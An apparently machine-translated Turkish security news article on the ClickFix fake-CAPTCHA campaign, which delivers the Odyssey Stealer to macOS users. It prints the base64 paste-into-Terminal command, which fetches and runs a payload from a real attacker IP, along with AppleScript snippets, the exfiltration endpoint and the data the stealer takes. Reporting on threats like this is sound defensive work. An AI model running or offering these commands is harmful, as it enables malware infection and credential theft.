Son aylarda, güvenlik araştırmacıları, MacOS kullanıcılarını bir CAPTCHA doğrulama sürecinin kisvesi altında hedefleyen yeni bir kimlik avı kampanyası gözlemlediler.
“ClickFix” olarak adlandırılan bu saldırı, kurbanları doğrudan terminallerinde kötü amaçlı komutlar yürütmeye yönlendirmek için sosyal mühendislik ve işletim sistemi tespitinin bir karışımından yararlanıyor.
Meşru Cloudflare tarzı kontrolleri taklit ederek, kötü amaçlı yazılım geleneksel ikili dosyaları bırakmaktan kaçınır, bunun yerine gizlenmiş bir Applescript yükü getiren ve çalıştıran baz 64 kodlu komut dosyalarına güvenir.
Başlangıçta, tehlikeye giren kullanıcılar, tehlikeye atılan bir URL’ye (genellikle popüler ticaret platformlarını taklit eden) gezen kullanıcılar işletim sistemlerine göre uyarlanmış bir insan doğrulama sayfası ile sunulmuştur.
Windows ziyaretçileri zararsız PowerShell talimatları alırken, macOS kullanıcılarına terminali açmaları, kopyalanmış bir komutu yapıştırmaları ve dönüş tuşuna basın.
.webp)
ForcePoint Analistleri, talimatlardaki bu ince ayrışmanın, MacOS kurbanlarını bir Base64 dizesini Bash’e kodlayan ve borulayan bir komutu yürütmek için kandırmak için tasarlandığını belirledi:-
echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXN0ICY=" \
| base64 -d | bashKomut çalıştığında, temel veri hasat faaliyetlerini gerçekleştiren gizlenmiş bir elma belgesi derlenmiş dosya (.scpt) yükler. Komut dosyası, benzersiz bir geçici dizin oluşturarak başlar. /tmpkullanma osascript Komutları birleştirme ve yürütme çağrıları:
osascript -e 'run script "on mkdir(item)\ntry\nset filePath to quoted form of (POSIX path of item)\ndo shell script \"mkdir -p \" & filePath\nend try\nend mkdir"'ForcePoint araştırmacıları, dizin kurulumundan sonra, kötü amaçlı yazılımların kullanıcının masaüstünü, belgeleri ve kütüphane klasörlerini, gibi uzantıları olan dosyalar için taradığını belirtti. .pdf– .docx– .keyve anahtarlık veritabanları, safari çerezleri ve Apple Notes veritabanlarını içeren tarayıcıya özgü eserler.
.webp)
Komut dosyası, Firefox ve Chromium tabanlı tarayıcılarda profilleri numaralandırmaya, Metamask ve Exodus gibi bilinen kripto uzantıları için kaydedilmiş kimlik bilgilerini, çerezleri, form geçmişini ve şifreli cüzdan dosyalarını kopyalamaya devam ediyor.
Enfeksiyon mekanizması derin dalış
Enfeksiyon mekanizması, görünüşte iyi huylu bir “doğrulama” komutunun manuel olarak yürütülmesine bağlıdır. Base64 kodlama kullanarak saldırganlar, imza tabanlı tespiti atlayarak yükün gerçek amacını gizler.
Kod çözüldüğünde, yük uzak bir sunucudan oldukça şaşkın bir elma metni alır (hxxp://45.146.130[.]131/d/vipx14350). Bu Applescript rastgele dize gizleme ve iç içe osascript Statik analizi engellemek için invokasyonlar.
Yürütme üzerine, kullanıcıyı parolalarının ayrıcalıkları artırmasını ister ve ardından sistem profili ayrıntılarını şu şekilde toplar:–
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataTypeToplanan dosyalarla birlikte hasat edilen veriler, /tmp/out.zip ve saldırganın C2 uç noktasına ek olarak 45.146.130.131/log.
Bir temizleme rutini daha sonra, adli iyileşmeyi karmaşıklaştırarak izleri silmek için geçici dizini kaldırır.
.webp)
Tanıdık CAPTCHA istemlerini terminal tabanlı sosyal mühendislik ile birleştirerek, ClickFix kötü amaçlı yazılım Odyssey Stealer, geleneksel antivirüs çözümlerini kaldıran ve daha yüksek kullanıcı farkındalığı ve çok katmanlı uç nokta kontrolleri ihtiyacını vurgulayan sofistike bir kaçırma tekniği gösterir.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın